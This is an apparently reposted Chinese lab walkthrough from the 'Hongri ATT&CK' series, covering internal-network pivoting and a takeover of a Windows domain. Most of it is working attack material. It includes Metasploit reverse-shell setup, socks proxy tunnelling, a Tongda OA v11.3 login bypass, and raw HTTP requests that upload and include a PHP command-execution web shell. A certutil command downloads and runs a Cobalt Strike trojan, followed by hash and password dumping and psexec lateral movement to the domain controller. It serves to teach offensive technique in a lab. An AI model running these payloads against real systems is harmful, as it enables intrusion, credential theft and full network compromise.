免责声明:涉及到的所有技术和工具仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透,否则产生的一切后果自行承担!
接上文之后,接下来我们进行内网渗透。
3、内网渗透
一、msf上线
首先上线web1
use exploit/multi/script/web_deliveryset target 7 # 选择目标系统set payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.43.177set lport 1111run
更改端口上线web2
sessions查看上线的机器
目前拿下了web1和web2
二、路由与socks5代理
我们目前拥有两个sessions,但是kali无法访问52网段的主机,所以我们需要在web1上增加一个通往192.168.52.0的路由
route add 目标网段 子网掩码 sessions号
路由转发只能将msf带进内网,kali想要将其他攻击程序带进内网还得搭建socks代理,这里前面有点小意外,重新上线了一下web1
目前sessions 4 为web2 ,sessions 5 为web1
继续搭建代理
首先在kali执行
ufw allow 12345./ew_for_linux64 -s rcsocks -l 1080 -e 12345
将ew_for_linux64上传给web1
upload /root/ew-master/ew_for_linux64在web1上执行
./ew_for_linux64 -s rssocks -d 192.168.43.177 -e 12345
搭建好后配置kali的proxychains,将socks5服务器指向127.0.0.1:1080,之后就可以使用proxychains将我们攻击机上的程序代理进第二层网络(52网段)了
vim /etc/proxychains4.confsocks5 127.0.0.1 1080
三、cs上线
使用auxliary/scanner/discovery/udp_probe 模块来扫描第二层网络中存活的主机
set rhosts 192.168.52.1-255set threads 5run
发现30主机,进行30主机的端口扫描
proxychains4 nmap -Pn -sT -sV -F -O 192.168.52.30 
发现8080端口存在nginx的http服务,在攻击机设置好代理访问
发现是通达OA v11.3 该版本存在任意用户登录、文件包含、文件上传等多个漏洞
抓包
发送到Repeater,修改三个点
1、修改/logincheck.php为/logincheck_code.php2、删除cookie3、在encode_type后加&UID=1
重发后得到新的SESSION,拼接/general访问抓包修改session即可
然后访问
http://ip/general/index.php?is_modify_pwd=1
登陆成功后抓包修改内容为
POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.52.30:8080Content-Length: 656Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: close------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg$command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh1YB4pV8McGB--
出现图片马的路径,文件包含图片马
POST /ispirit/interface/gateway.php HTTP/1.1Host: 192.168.52.30:8080Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 70Content-Type: application/x-www-form-urlencodedjson={"url":"/general/../../attach/im/2102/96964187.jpg"}&cmd=whoami
使用cs生成木马运行上线cs
将生成的木马放入kali,并在同目录开启http服务
python3 -m http.server 端口
连接sessions1 远程下载木马,然后再次开启http服务
在burpsuit中刚才whoami的地方替换为下载命令,远程从web1上下载木马
certutil.exe -urlcache -split -f http://192.168.52.10:1008/5.exe
下载成功后运行木马即可上线cs
拿到后进行信息收集内网穿刺,目标发现和密码抓取
net viewhash dumplogonpasswords
收集好了以后发现了30和40两台机器,其中发现DC为30
新建一个SMB的监听器
然后进行横向拓展
选择目标列表,选择自己要横向移动的机器,右键选择jump->psexec
选择最后一条administrator,选择smb监听器以及刚才上线的session
就可以得到93.30这台DC,同样的方法拿下PC2
至此拿下所有机器!
原文始发于微信公众号(智检安全):红日ATT&CK实战系列七(下)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论